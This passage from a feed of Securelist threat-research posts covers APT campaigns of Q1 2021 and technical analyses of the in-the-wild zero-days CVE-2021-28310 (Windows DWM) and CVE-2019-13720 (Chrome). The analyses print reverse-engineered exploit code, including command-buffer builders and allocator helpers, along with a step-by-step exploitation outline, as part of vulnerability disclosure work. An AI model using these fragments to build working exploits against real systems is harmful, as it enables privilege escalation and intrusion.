monitoring of detections for FinFisher spyware tools, we discovered traces that point to recent FinFly Web deployments. In particular, we discovered two servers with web applications that we suspect, with high confidence, were generated using FinFly Web. FinFly Web is, in essence, a suite of tools and packages that implement a web-based exploitation server. It was first publicly documented in 2014, in the aftermath of the Gamma Group hacking incident. One of the suspected FinFly Web servers was active for more than a year between October 2019 and December 2020. 
This server was disabled a day after our discovery last December. Nevertheless, we were able to capture a copy of its landing page, which included JavaScript used to profile victims using what appears to be previously unknown code. In the second case, the server hosting FinFly Web was already offline at the moment of discovery, so we drew our conclusions using available historical data. As it turned out, it was active for a very short time around September 2020 on a host that appears to have been impersonating the popular Mail.ru service. Surprisingly, this server began answering queries again on January 12. So far, we haven't seen any related payloads being dropped by these web pages.\n\n## Russian-speaking activity\n\nKazuar is a .NET backdoor usually associated with the Turla threat actor (aka Snake and Uroboros). Recently, Kazuar received renewed interest due to its similarities with the Sunburst backdoor. Although the capabilities of Kazuar have already been exposed in public research, many interesting facts about this backdoor were not made public. Our latest reports focus on the changes the threat actor made to the September and November versions of its backdoor.\n\nOn February 24, the National Security Defense Council of Ukraine (NSDC) publicly warned that a threat actor had exploited a national documents circulation system (SEI EB) to distribute malicious documents to Ukrainian public authorities. The alert contained a few related network IoCs, and specified that the documents used malicious macros in order to drop an implant onto targeted systems. Thanks to the shared IoCs, we were able to attribute this attack, with high confidence, to the Gamaredon threat actor. 
The malicious server IP mentioned by the NSDC has been known to Kaspersky since February as Gamaredon infrastructure.\n\nOn January 27, the French national cybersecurity agency (ANSSI) published a report describing an attack campaign that targeted publicly exposed and obsolete Centreon systems between 2017 and 2020, in order to deploy Fobushell (aka P.A.S.) webshells and Exaramel implants. ANSSI associated the campaign with the Sandworm intrusion-set, which we refer to as Hades. Although we specifically looked for additional compromised Centreon systems, Exaramel implant samples or associated infrastructure, we were unable to retrieve any useful artifacts from which we could initiate a comprehensive investigation. However, we did identify three Centreon servers where a Fobushell webshell had been deployed. One of those Fobushell samples was identical to another we previously identified on a Zebrocy C2 server.\n\n## Chinese-speaking activity\n\nWe discovered a set of malicious activities, which we named EdwardsPheasant, targeting mainly government organizations in Vietnam since June 2020. The attackers leverage previously unknown and obfuscated backdoors and loaders. The activities peaked in November 2020, but are still ongoing. The associated threat actor continues to leverage its tools and tactics (described in our private report) to compromise targets or maintain access in their networks. While we could identify similarities with the tools and tactics associated with Cycldek (aka Goblin Panda) and Lucky Mouse (aka Emissary Panda), we have been unable to attribute this set of activities to either of them conclusively.\n\nWe investigated a long-running espionage campaign, dubbed A41APT, targeting multiple industries, including the Japanese manufacturing industry and its overseas bases, which has been active since March 2019. 
The attackers used vulnerabilities in an SSL-VPN product to deploy a multi-layered loader we dubbed Ecipekac (aka DESLoader, SigLoader and HEAVYHAND). We attribute this activity to APT10 with high confidence. Most of the discovered payloads deployed by this loader are fileless and have not been seen before. We observed SodaMaster (aka DelfsCake, dfls and DARKTOWN), P8RAT (aka GreetCake and HEAVYPOT), and FYAnti (aka DILLJUICE Stage 2) which in turn loads QuasarRAT. In November and December 2020, two public blog posts were published about this campaign. One month later, we observed new activities from the actor with an updated version of some of their implants designed to evade security products and make analysis harder for researchers. You can read more in our [public report](<https://securelist.com/apt10-sophisticated-multi-layered-loader-ecipekac-discovered-in-a41apt-campaign/101519/>).\n\n## Middle East\n\nWe recently came across previously unknown malicious artifacts that we attributed to the Lyceum/Hexane threat group, showing that the attackers behind it are still active and have been developing their toolset during the last year. Although Lyceum still prefers taking advantage of DNS tunneling, it appears to have replaced the previously documented .NET payload with a new C++ backdoor and a PowerShell script that serve the same purpose. Our telemetry revealed that the threat group's latest endeavors are focused on going after entities within one country \u2013 Tunisia. The victims we observed were all high-profile Tunisian organizations, such as telecommunications or aviation companies. Based on the targeted industries, we assume that the attackers may have been interested in compromising these entities to track the movements and communications of individuals that are of interest to them. 
This could mean that the latest Lyceum cluster has an operational focus on targeting Tunisia, or that it is a subset of broader activity that is yet to be discovered.\n\nOn November 19, 2020, Shadow Chaser Group tweeted about a suspected MuddyWater APT malicious document potentially targeting a university in the United Arab Emirates. Based on our analysis since then, we suspect this intrusion is part of a campaign that started at least in early October 2020 and was last seen active in late December 2020. The threat actor relied on VBS-based malware to infect organizations from government, NGO and education sectors. Our telemetry, however, indicates that no further tools were deployed and we do not believe that data theft took place either. This indicates to us that the attackers are currently in the reconnaissance phase of their operation, and we expect subsequent waves of attacks to follow in the near future. In our private report, we provide an in-depth analysis of the malicious documents used by this threat actor and study their similarities to known MuddyWater tooling. The infrastructure setup and communications scheme are also similar to past incidents attributed to this group. The actor maintains a small set of first-stage C2 servers to connect back from the VBS implant for initial communications. Initial reconnaissance is performed by the actor and communication with the implant is handed off to a second-stage C2 for additional downloads. Finally, we present similarities with known TTPs of the MuddyWater group and attribute this campaign to them with medium confidence.\n\nDomestic Kitten is a threat group mainly known for its mobile backdoors. The group's operations were exposed in 2018, showing that it was conducting surveillance attacks against individuals in the Middle East. The threat group targeted Android users by sending them popular and well-known applications that were backdoored and contained malicious code. 
Many of the applications had religious or political themes and were intended for Farsi, Arabic and Kurdish speakers, possibly alluding to this attack's main targets. We have discovered new evidence showing that Domestic Kitten has been using PE executables to target victims using Windows since at least 2013, with some evidence that it goes back to 2011. The Windows version, which, to the best of our knowledge, has not been described in the past, was delivered in several versions, with the more recent one used for at least three and a half years to target individuals in parallel to the group's mobile campaigns. The implant functionality and infrastructure in that version have remained the same all along, and have been used in the group's activity witnessed this year.\n\nFerocious Kitten is an APT group that has been active against Persian-speaking individuals since 2015 and appears to be based in Iran. Although it has been active over a large timespan, the group has mostly operated under the radar and, to the best of our knowledge, has not been covered by security researchers. It only recently attracted attention when a lure document was uploaded to VirusTotal and was brought to public knowledge by researchers on Twitter. Subsequently, one of its implants was analyzed by a Chinese intelligence firm. We have been able to expand some of the findings on the group and provide insights on additional variants. The malware dropped from the aforementioned document is dubbed MarkiRAT and is used to record keystrokes and clipboard content, provide file download and upload capabilities as well as the ability to execute arbitrary commands on the victim's machine. We were able to trace the implant back to at least 2015, along with variants intended to hijack the execution of the Telegram and Chrome applications as a persistence method. Interestingly, some of the TTPs used by this threat actor are reminiscent of other groups operating in the domain of dissident surveillance. 
For example, it used the same C2 domains across its implants for years, which was witnessed in the activity of Domestic Kitten. In the same vein, the Telegram execution hijacking technique observed in this campaign by Ferocious Kitten was also observed being used by Rampant Kitten, as covered by Check Point. In our private report, we expand the details on these findings as well as provide analysis and mechanics of the MarkiRAT malware.\n\nKarkadann is a threat actor that has been targeting government bodies and news outlets in the Middle East since at least October 2020. The threat actor leverages tailor-made malicious documents with embedded macros that trigger an infection chain, opening a URL in Internet Explorer. The minimal functionality present in the macros and the browser specification suggest that the threat actor might be exploiting a privilege-escalation vulnerability in Internet Explorer. Despite the small amount of evidence available for analysis in the Karkadann case, we were able to find several similarities to the Piwiks case, a watering-hole attack we discovered that targeted multiple prominent websites in the Middle East. Our private report presents the recent Karkadann campaigns and the similarities between this campaign and the Piwiks case. The report concludes with some infrastructure overlaps with unattributed clusters that we have seen since last year that are potentially linked to the same threat actor.\n\n## Southeast Asia and Korean Peninsula\n\nWe discovered that the Kimsuky group adopted a new method to deliver its malware in its latest campaign on a South Korean stock trading application. In this campaign, beginning in December 2020, the group compromised a website belonging to the vendor of stock trading software, replacing the hosted installation package with a malicious one. Kimsuky also delivered its malware by utilizing a malicious Hangul (HWP) document containing COVID-19-related bait that discusses a government relief fund. 
Both infection vectors ultimately deliver the Quasar RAT. Compared to Kimsuky's last reported infection chain, composed of various scripts, the new scheme adds complications and introduces less popular file types, involving VBS scripts, XML and Extensible Stylesheet Language (XSL) files with embedded C# code in order to fetch and execute stagers and payloads. Based on the lure document and characteristics of the compromised installation package, we conclude that this attack is financially motivated, which, as we have previously reported, is one of Kimsuky's main focus areas.\n\nOn January 25, the Google Threat Analysis Group (TAG) announced that a North Korean-related threat actor had targeted security researchers. According to Google TAG's blog, this actor used highly sophisticated social engineering, approached security researchers through social media, and delivered a compromised Visual Studio project file or lured them to their blog and installed a Chrome exploit. On March 31, Google TAG released an update on this activity showing another wave of fake social media profiles and a company the actor set up mid-March. We can confirm that several infrastructures on the blog overlap with our previously published reporting about Lazarus group's ThreatNeedle cluster. Moreover, the malware mentioned by Google matched ThreatNeedle \u2013 malware that we have been tracking since 2018. While investigating associated information, a fellow external researcher confirmed that he was also compromised by this attack, sharing information for us to investigate. We discovered additional C2 servers after decrypting configuration data from the compromised host. The servers were still in use during our investigation, and we were able to get additional data, analyzing logs and files present on the servers. We assess that the published infrastructure was used not only to target security researchers but also in other Lazarus attacks. 
We found a relatively large number of hosts communicating with the C2s at the time of our research. You can read our public report [here](<https://securelist.com/lazarus-threatneedle/100803/>).\n\nFollowing up our previous investigation into Lazarus attacks on the defense industry using ThreatNeedle, we discovered another malware cluster named CookieTime used in a campaign mainly focused on the defense industry. We detected activity in September and November 2020, with samples dating back to April 2020. Compared to the already known malware clusters of the Lazarus group, CookieTime shows a different structure and functionality. This malware communicates with the C2 server using the HTTP protocol. In order to deliver the request type to the C2 server, it uses encoded cookie values and fetches command files from the C2 server. The C2 communication takes advantage of steganography techniques, delivered in files exchanged between infected clients and the C2 server. The contents are disguised as GIF image files, but contain encrypted commands from the C2 server and command execution results. We had a chance to look into the command and control script as a result of working closely with a local CERT to take down the threat actor's infrastructure. The malware control servers are configured in a multi-stage fashion and only deliver the command file to valuable hosts.\n\nWhile investigating the artifacts of a supply-chain attack on the Vietnam Government Certification Authority's (VGCA) website, we discovered that the first Trojanized package dates to June 2020. Unravelling that thread, we identified a number of post-compromise tools in the form of plugins deployed using PhantomNet malware, which was delivered using Trojanized packages. Our analysis of these plugins revealed similarities with the previously analyzed CoughingDown malware. 
In our private report, we offer a detailed description for each post-compromise tool used in the attack, as well as other tools belonging to the actor's arsenal. Finally, we also explore CoughingDown attribution in the light of recent discoveries.\n\nOn February 10, DBAPPSecurity published details about a zero-day exploit they discovered last December. Aside from the details of the exploit itself, researchers also mentioned it being used in the wild by BitterAPT. While the initial report gave no supporting evidence for that attribution claim, our investigation into this activity confirms the exploit was in fact being used exclusively by this actor. We assigned the name TurtlePower to the campaign that makes use of this exploit, along with the other tools used to target governmental and telecom entities in Pakistan and China. We have also confidently linked the origin of this exploit to a broker we refer to as Moses. Moses has been responsible for the development of at least five exploits patched in the last two years. We have also been able to tie the usage of some of these exploits to at least two different actors thus far \u2013 BitterAPT and DarkHotel. At this time, it is unclear how these threat actors are obtaining exploits from Moses, whether it is through direct purchase or another third-party provider. During the TurtlePower campaign, BitterAPT used a wide array of tools on its victims, including a stage one payload named ArtraDownloader, a stage two payload named Splinter, a keylogger named SourLogger, an infostealer named SourFilling, as well as variations of Mimikatz to gather specific files and maintain its access. This particular campaign also appears to be narrowly focused on targets within Pakistan and China (based on the initial report referenced). While we can verify specific targeting within Pakistan using our own data, we have not been able to do the same regarding China. 
Use of CVE-2021-1732 peaked between June and July 2020, but the overall campaign is still ongoing.\n\nIn 2020, we observed new waves of attacks related to Dropping Elephant (aka Patchwork, Chinastrats), focusing on targets in China and Pakistan. We also noted a few targets outside of the group's traditional area of operations, namely in the Middle East, and a growing interest in the African continent. The attacks followed the group's well-established TTPs, which include the use of malicious documents crafted to exploit a remote code execution vulnerability in Microsoft Office, and the signature JakyllHyde (aka BadNews) Trojan in the later infection stages. Dropping Elephant introduced a new loader for JakyllHyde, a tool we named Crypta. It contains mechanisms to hinder detection and appears to be a core component of this APT actor's recent toolset. Crypta and its variants have been observed in multiple scenarios loading a wide range of subsequent payloads, such as Bozok RAT, Quasar RAT and LokiBot. An additional Trojan discovered during our research was PubFantacy. To our knowledge, this tool has never been publicly described and has been used to target Windows servers since at least 2018.\n\nWe recently discovered a previously publicly unknown Android implant used in 2018-2019 by the SideWinder threat group, which we dubbed BroStealer. The main purpose of the BroStealer implant is to collect sensitive information from a victim's device, such as photos, SMS messages, call recordings and files from various messaging applications. Although SideWinder has numerous campaigns against victims using the Windows platform, recent reports have shown that this threat group also goes after its targets via the mobile platform.\n\n## Other interesting discoveries\n\nIn February 2019, multiple antivirus companies received a collection of malware samples, most of them associated with various known APT groups. Some of the samples cannot be associated with any known activity. 
Some, in particular, attracted our attention due to their sophistication. The samples were compiled in 2014 and, accordingly, were likely deployed in 2014 and possibly as late as 2015. Although we have not found any shared code with any other known malware, the samples have intersections of coding patterns, style and techniques that have been seen in various [Lambert families](<https://securelist.com/unraveling-the-lamberts-toolkit/77990/>). We therefore named this malware Purple Lambert. Purple Lambert is composed of several modules, with its network module passively listening for a magic packet. It is capable of providing an attacker with basic information about the infected system and executing a received payload. Its functionality reminds us of Gray Lambert, another user-mode passive listener. Gray Lambert turned out to be a replacement of the kernel-mode passive-listener White Lambert implant in multiple incidents. In addition, Purple Lambert implements functionality similar to, but in different ways, both Gray Lambert and White Lambert. Our report, available to subscribers of our APT threat reports, includes discussion of both the passive-listener payload and the loader functionality included in the main module.\n\n## Final thoughts\n\nWhile the TTPs of some threat actors remain consistent over time, relying heavily on social engineering as a means of gaining a foothold in a target organization or compromising an individual's device, others refresh their toolsets and extend the scope of their activities. Our regular quarterly reviews are intended to highlight the key developments of APT groups.\n\nHere are the main trends that we've seen in Q1 2021:\n\n * Perhaps the most predominant attack we researched in this quarter was the SolarWinds attack. SolarWinds showed once again how successful a supply-chain attack can be, especially where attackers go the extra mile to remain hidden and maintain persistence in a target network. 
The scope of this attack is still being investigated as more zero-day flaws are discovered in SolarWinds products.\n * Another critical wave of attacks was the exploitation of Microsoft Exchange zero-day vulnerabilities by multiple threat actors. We recently discovered another campaign using these exploits with different targeting, possibly related to the same cluster of activities already reported.\n * Lazarus group's bold campaign targeting security researchers worldwide also utilized zero-day vulnerabilities in browsers to compromise their targets. Their campaigns used themes centered on the use of zero-days to lure relevant researchers, possibly in an attempt to steal vulnerability research.\n\nAs always, we would note that our reports are the product of our visibility into the threat landscape. However, it should be borne in mind that, while we strive to continually improve, there is always the possibility that other sophisticated attacks may fly under our radar.", "cvss3": {}, "published": "2021-04-27T10:00:26", "type": "securelist", "title": "APT trends report Q1 2021", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2021-1732"], "modified": "2021-04-27T10:00:26", "id": "SECURELIST:A10F281EF99381636376D6F6C6501E22", "href": "https://securelist.com/apt-trends-report-q1-2021/101967/", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-04-29T16:18:40", "description": "\n\nWhile analyzing the [CVE-2021-1732 exploit](<https://ti.dbappsecurity.com.cn/blog/index.php/2021/02/10/windows-kernel-zero-day-exploit-is-used-by-bitter-apt-in-targeted-attack/>) originally discovered by the DBAPPSecurity Threat Intelligence Center and used by the BITTER APT group, we discovered another zero-day exploit we believe is linked to the same actor. We reported this new exploit to Microsoft in February and after confirmation that it is indeed a zero-day, it received the designation CVE-2021-28310. 
Microsoft [released a patch](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-28310>) to this vulnerability as a part of its April security updates.\n\nWe believe this exploit is used in the wild, potentially by several threat actors. It is an escalation of privilege (EoP) exploit that is likely used together with other browser exploits to escape sandboxes or get system privileges for further access. Unfortunately, we weren't able to capture a full chain, so we don't know if the exploit is used with another browser zero-day, or coupled with known, patched vulnerabilities.\n\n \nThe exploit was initially identified by our advanced exploit prevention technology and related detection records. In fact, over the past few years, we have built a multitude of exploit protection technologies into our products that have detected several zero-days, proving their effectiveness time and again. We will continue to improve defenses for our users by enhancing technologies and working with third-party vendors to patch vulnerabilities, making the internet more secure for everyone. In this blog we provide a technical analysis of the vulnerability and how the bad guys exploited it. More information about BITTER APT and IOCs are available to customers of the Kaspersky Intelligence Reporting service. Contact: [intelreports@kaspersky.com](<mailto:intelreports@kaspersky.com>).\n\n## Technical details\n\nCVE-2021-28310 is an out-of-bounds (OOB) write vulnerability in dwmcore.dll, which is part of Desktop Window Manager (dwm.exe). Due to the lack of bounds checking, attackers are able to create a situation that allows them to write controlled data at a controlled offset using DirectComposition API. 
[DirectComposition](<https://docs.microsoft.com/en-us/windows/win32/directcomp/directcomposition-portal>) is a Windows component that was introduced in Windows 8 to enable bitmap composition with transforms, effects and animations, with support for bitmaps of different sources (GDI, DirectX, etc.). We've already published a [blogpost](<https://securelist.com/cve-2019-0797-zero-day-vulnerability/89885/>) about in-the-wild zero-days abusing DirectComposition API. DirectComposition API is implemented by the win32kbase.sys driver and the names of all related syscalls start with the string "NtDComposition".\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/04/13101315/CVE_2021_28310_01.png>)\n\n_**DirectComposition syscalls in the win32kbase.sys driver**_\n\nFor exploitation only three syscalls are required: NtDCompositionCreateChannel, NtDCompositionProcessChannelBatchBuffer and NtDCompositionCommitChannel. The NtDCompositionCreateChannel syscall initiates a channel that can be used together with the NtDCompositionProcessChannelBatchBuffer syscall to send multiple DirectComposition commands in one go for processing by the kernel in a batch mode. For this to work, commands need to be written sequentially in a special buffer mapped by NtDCompositionCreateChannel syscall. 
Each command has its own format with a variable length and list of parameters.\n \n \n enum DCOMPOSITION_COMMAND_ID\n {\n \tProcessCommandBufferIterator,\n \tCreateResource,\n \tOpenSharedResource,\n \tReleaseResource,\n \tGetAnimationTime,\n \tCapturePointer,\n \tOpenSharedResourceHandle,\n \tSetResourceCallbackId,\n \tSetResourceIntegerProperty,\n \tSetResourceFloatProperty,\n \tSetResourceHandleProperty,\n \tSetResourceHandleArrayProperty,\n \tSetResourceBufferProperty,\n \tSetResourceReferenceProperty,\n \tSetResourceReferenceArrayProperty,\n \tSetResourceAnimationProperty,\n \tSetResourceDeletedNotificationTag,\n \tAddVisualChild,\n \tRedirectMouseToHwnd,\n \tSetVisualInputSink,\n \tRemoveVisualChild\n };\n\n**_List of command IDs supported by the function DirectComposition::CApplicationChannel::ProcessCommandBufferIterator_**\n\nWhile these commands are processed by the kernel, they are also serialized into another format and passed by the Local Procedure Call (LPC) protocol to the Desktop Window Manager (dwm.exe) process for rendering to the screen. 
This procedure could be initiated by the third syscall \u2013 NtDCompositionCommitChannel.\n\nTo trigger the vulnerability the discovered exploit uses three types of commands: CreateResource, ReleaseResource and SetResourceBufferProperty.\n \n \n void CreateResourceCmd(int resourceId)\n {\n \tDWORD *buf = (DWORD *)((PUCHAR)pMappedAddress + BatchLength);\n \t*buf = CreateResource;\n \tbuf[1] = resourceId;\n \tbuf[2] = PropertySet; // MIL_RESOURCE_TYPE\n \tbuf[3] = FALSE;\n \tBatchLength += 16;\n }\n \n void ReleaseResourceCmd(int resourceId)\n {\n \tDWORD *buf = (DWORD *)((PUCHAR)pMappedAddress + BatchLength);\n \t*buf = ReleaseResource;\n \tbuf[1] = resourceId;\n \tBatchLength += 8;\n }\n \n void SetPropertyCmd(int resourceId, bool update, int propertyId, int storageOffset, int hidword, int lodword)\n {\n \tDWORD *buf = (DWORD *)((PUCHAR)pMappedAddress + BatchLength);\n \t*buf = SetResourceBufferProperty;\n \tbuf[1] = resourceId;\n \tbuf[2] = update;\n \tbuf[3] = 20;\n \tbuf[4] = propertyId;\n \tbuf[5] = storageOffset;\n \tbuf[6] = _D2DVector2; // DCOMPOSITION_EXPRESSION_TYPE\n \tbuf[7] = hidword;\n \tbuf[8] = lodword;\n \tBatchLength += 36;\n }\n\n_**Format of commands used in exploitation**_\n\nLet's take a look at the function CPropertySet::ProcessSetPropertyValue in dwmcore.dll. This function is responsible for processing the SetResourceBufferProperty command. 
We are most interested in the code responsible for handling DCOMPOSITION_EXPRESSION_TYPE = D2DVector2.\n \n \n int CPropertySet::ProcessSetPropertyValue(CPropertySet *this, ...)\n {\n ...\n \n if (expression_type == _D2DVector2)\n {\n if (!update)\n {\n CPropertySet::AddProperty<D2DVector2>(this, propertyId, storageOffset, _D2DVector2, value);\n }\n else\n {\n if ( storageOffset != this->properties[propertyId]->offset & 0x1FFFFFFF )\n {\n goto fail;\n }\n \n CPropertySet::UpdateProperty<D2DVector2>(this, propertyId, _D2DVector2, value);\n }\n }\n \n ...\n }\n \n int CPropertySet::AddProperty<D2DVector2>(CResource *this, unsigned int propertyId, int storageOffset, int type, _QWORD *value)\n {\n int propertyIdAdded;\n \n int result = PropertySetStorage<DynArrayNoZero,PropertySetUserModeAllocator>::AddProperty<D2DVector2>(\n this->propertiesData,\n type,\n value,\n &propertyIdAdded);\n if ( result < 0 )\n {\n return result;\n }\n \n if ( propertyId != propertyIdAdded || storageOffset != this->properties[propertyId]->offset & 0x1FFFFFFF )\n {\n return 0x88980403;\n }\n \n result = CPropertySet::PropertyUpdated<D2DMatrix>(this, propertyId);\n if ( result < 0 )\n {\n return result;\n }\n \n return 0;\n }\n \n int CPropertySet::UpdateProperty<D2DVector2>(CResource *this, unsigned int propertyId, int type, _QWORD *value)\n {\n if ( this->properties[propertyId]->type == type )\n {\n *(_QWORD *)(this->propertiesData + (this->properties[propertyId]->offset & 0x1FFFFFFF)) = *value;\n \n int result = CPropertySet::PropertyUpdated<D2DMatrix>(this, propertyId);\n if ( result < 0 )\n {\n return result;\n }\n \n return 0;\n }\n else\n {\n return 0x80070057;\n }\n }\n\n**_Processing of the SetResourceBufferProperty (D2DVector2) command in dwmcore.dll_**\n\nFor the SetResourceBufferProperty command with the expression type set to D2DVector2, the function CPropertySet::ProcessSetPropertyValue(\u2026) would either call CPropertySet::AddProperty<D2DVector2>(\u2026) or 
CPropertySet::UpdateProperty<D2DVector2>(\u2026) depending on whether the update flag is set in the command. The first thing that catches the eye is the way the new property is added in the CPropertySet::AddProperty<D2DVector2>(\u2026) function. You can see that it adds a new property to the resource, but it only checks if the propertyId and storageOffset of a new property are equal to the provided values after the new property is added, and returns an error if that's not the case. Checking something after a job is done is bad coding practice and can result in vulnerabilities. However, a real issue can be found in the CPropertySet::UpdateProperty<D2DVector2>(\u2026) function. No check takes place that will ensure if the provided propertyId is less than the count of properties added to the resource. As a result, an attacker can use this function to perform an OOB write past the propertiesData buffer if it manages to bypass two additional checks for data inside the properties array.\n \n \n (1)\tstorageOffset == this->properties[propertyId]->offset & 0x1FFFFFFF\n (2)\tthis->properties[propertyId]->type == type\n\n_**Conditions which need to be met for exploitation in dwmcore.dll**_\n\nThese checks could be bypassed if an attacker is able to allocate and release objects in the dwm.exe process to groom heap into the desired state and spray memory at specific locations with fake properties. 
The discovered exploit manages to do this using the CreateResource, ReleaseResource and SetResourceBufferProperty commands.\n\nAt the time of writing, we still hadn't analyzed the updated binaries that are fixing this vulnerability, but to exclude the possibility of other variants for this vulnerability Microsoft would need to check the count of properties for other expression types as well.\n\nEven with the above issues in dwmcore.dll, if the desired memory state is achieved to bypass the previously mentioned checks and a batch of commands are issued to trigger the vulnerability, it still won't be triggered because there is one more thing preventing it from happening.\n\nAs mentioned above, commands are first processed by the kernel and only after that are they sent to Desktop Window Manager (dwm.exe). This means that if you try to send a command with an invalid propertyId, NtDCompositionProcessChannelBatchBuffer syscall will return an error and the command will not be passed to the dwm.exe process. SetResourceBufferProperty commands with expression type set to D2DVector2 are processed in the win32kbase.sys driver with the functions DirectComposition::CPropertySetMarshaler::AddProperty<D2DVector2>(\u2026) and DirectComposition::CPropertySetMarshaler::UpdateProperty<D2DVector2>(\u2026), which are very similar to those present in dwmcore.dll (it's quite likely they were copy-pasted). 
However, the kernel version of the UpdateProperty<D2DVector2> function has one notable difference \u2013 it actually checks the count of properties added to the resource.\n \n \n int DirectComposition::CPropertySetMarshaler::UpdateProperty<D2DVector2>(DirectComposition::CPropertySetMarshaler *this, unsigned int *commandParams, _QWORD *value)\n {\n unsigned int propertyId = commandParams[0];\n unsigned int storageOffset = commandParams[1];\n unsigned int type = commandParams[2];\n \n if ( propertyId >= this->propertiesCount\n || storageOffset != this->properties[propertyId]->offset & 0x1FFFFFFF)\n || type != this->properties[propertyId]->type )\n {\n return 0xC000000D;\n }\n else\n {\n *(_QWORD *)(this->propertiesData + (this->properties[propertyId]->offset & 0x1FFFFFFF)) = *value;\n ...\n }\n return 0;\n }\n\n_**DirectComposition::CPropertySetMarshaler::UpdateProperty<D2DVector2>(\u2026) in win32kbase.sys**_\n\nThe check for propertiesCount in the kernel mode version of the UpdateProperty<D2DVector2> function prevents further processing of a malicious command by its user mode twin and mitigates the vulnerability, but this is where DirectComposition::CPropertySetMarshaler::AddProperty<D2DVector2>(\u2026) comes in to play. The kernel version of the AddProperty<D2DVector2> function works exactly like its user mode variant and it also applies the same behavior of checking property after it has already been added and returns an error if propertyId and storageOffset of the created property do not match the provided values. Because of this, it's possible to use the AddProperty<D2DVector2> function to add a new property and force the function to return an error and cause inconsistency between the number of properties assigned to the same resource in kernel mode/user mode. 
The propertiesCount check in the kernel could be bypassed this way and malicious commands would be passed to Desktop Window Manager (dwm.exe).\n\nInconsistency between the number of properties assigned to the same resource in kernel mode/user mode could be a source of other vulnerabilities, so we recommend that Microsoft change the behavior of the AddProperty function and check properties before they are added.\n\nThe whole exploitation process for the discovered exploit is as follows:\n\n 1. Create a large number of resources with properties of specific size to get the heap into a predictable state.\n 2. Create additional resources with properties of specific size and content to spray memory at specific locations with fake properties.\n 3. Release resources created at stage 2.\n 4. Create additional resources with properties. These resources will be used to perform OOB writes.\n 5. Make holes among resources created at stage 1.\n 6. Create additional properties for resources created at stage 4. Their buffers are expected to be allocated at specific locations.\n 7. Create "special" properties to cause inconsistency between the number of properties assigned to the same resource in kernel mode/user mode for resources created at stage 4.\n 8. Use OOB write vulnerability to write shellcode, create an object and get code execution.\n 9. 
Inject additional shellcode into another system process.\n\nKaspersky products detect this exploit with the verdicts:\n\n * HEUR:Exploit.Win32.Generic\n * HEUR:Trojan.Win32.Generic\n * PDM:Exploit.Win32.Generic", "cvss3": {}, "published": "2021-04-13T17:35:50", "type": "securelist", "title": "Zero-day vulnerability in Desktop Window Manager (CVE-2021-28310) used in the wild", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2019-0797", "CVE-2021-1732", "CVE-2021-28310"], "modified": "2021-04-13T17:35:50", "id": "SECURELIST:A3D3514100806269750A23D748D34C59", "href": "https://securelist.com/zero-day-vulnerability-in-desktop-window-manager-cve-2021-28310-used-in-the-wild/101898/", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-05-29T22:19:56", "description": "\n\nBack in October 2019 we detected a classic watering-hole attack on a North Korea-related news site that exploited a chain of Google Chrome and Microsoft Windows zero-days. While we've already published blog posts briefly describing this operation (available [here](<https://securelist.com/chrome-0-day-exploit-cve-2019-13720-used-in-operation-wizardopium/94866/>) and [here](<https://securelist.com/windows-0-day-exploit-cve-2019-1458-used-in-operation-wizardopium/95432/>)), in this blog post we'd like to take a deep technical dive into the exploits and vulnerabilities used in this attack.\n\n## Google Chrome remote code execution exploit\n\nIn the [original blog post](<https://securelist.com/chrome-0-day-exploit-cve-2019-13720-used-in-operation-wizardopium/94866/>) we described the exploit loader responsible for initial validation of the target and execution of the next stage JavaScript code containing the full browser exploit. The exploit is huge because, besides code, it contains byte arrays with shellcode, a Portable Executable (PE) file and WebAssembly (WASM) module used in the later stages of exploitation. 
The exploit abused a vulnerability in the WebAudio OfflineAudioContext interface and was targeting two release builds of Google Chrome 76.0.3809.87 and 77.0.3865.75. However, the vulnerability was introduced long before that and much earlier releases with a WebAudio component are also vulnerable. At the time of our discovery the current version of Google Chrome was 78, and while this version was also affected, the exploit did not support it and had a number of checks to ensure that it would only be executed on affected versions to prevent crashes. After our report, the vulnerability was assigned CVE-2019-13720 and was fixed in version 78.0.3904.87 with the following [commit](<https://chromium.googlesource.com/chromium/src.git/+/6a2e670a243b815cf043f8da4d26ecb9a64d307b>). A use-after-free (UAF) vulnerability, it could be triggered due to a race condition between the Render and Audio threads:\n \n \n if (!buffer) {\n +\tBaseAudioContext::GraphAutoLocker context_locker(Context());\n +\tMutexLocker locker(process_lock_);\n \treverb_.reset();\n \tshared_buffer_ = nullptr;\n \treturn;\n\nAs you can see, when the audio buffer is set to null in ConvolverNode and an active buffer already exists within the Reverb object, the function SetBuffer() can destroy reverb_ and shared_buffer_ objects.\n \n \n class MODULES_EXPORT ConvolverHandler final : public AudioHandler {\n ...\n std::unique_ptr<Reverb> reverb_;\n std::unique_ptr<SharedAudioBuffer> shared_buffer_;\n ...\n\nThese objects might still be in use by the Render thread because there is no proper synchronization between the two threads in the code. A patch added two missing locks (graph lock and process lock) for when the buffer is nullified.\n\nThe exploit code was obfuscated, but we were able to fully reverse engineer it and reveal all the small details. 
By looking at the code, we can see the author of the exploit has excellent knowledge of the internals of specific Google Chrome components, especially the [PartitionAlloc](<https://github.com/scrapy/base-chromium/blob/master/allocator/partition_allocator/PartitionAlloc.md>) memory allocator. This can clearly be seen from the snippets of reverse engineered code below. These functions are used in the exploit to retrieve useful information from internal structures of the allocator, including: SuperPage address, PartitionPage address by index inside the SuperPage, the index of the used PartitionPage and the address of PartitionPage metadata. All constants are taken from [partition_alloc_constants.h](<https://chromium.googlesource.com/chromium/src/+/master/base/allocator/partition_allocator/partition_alloc_constants.h>):\n \n \n function getSuperPageBase(addr) {\n \tlet superPageOffsetMask = (BigInt(1) << BigInt(21)) - BigInt(1);\n \tlet superPageBaseMask = ~superPageOffsetMask;\n \tlet superPageBase = addr & superPageBaseMask;\n \treturn superPageBase;\n }\n \n function getPartitionPageBaseWithinSuperPage(addr, partitionPageIndex) {\n \tlet superPageBase = getSuperPageBase(addr);\n \tlet partitionPageBase = partitionPageIndex << BigInt(14);\n \tlet finalAddr = superPageBase + partitionPageBase;\n \treturn finalAddr;\n }\n \n function getPartitionPageIndex(addr) {\n \tlet superPageOffsetMask = (BigInt(1) << BigInt(21)) - BigInt(1);\n \tlet partitionPageIndex 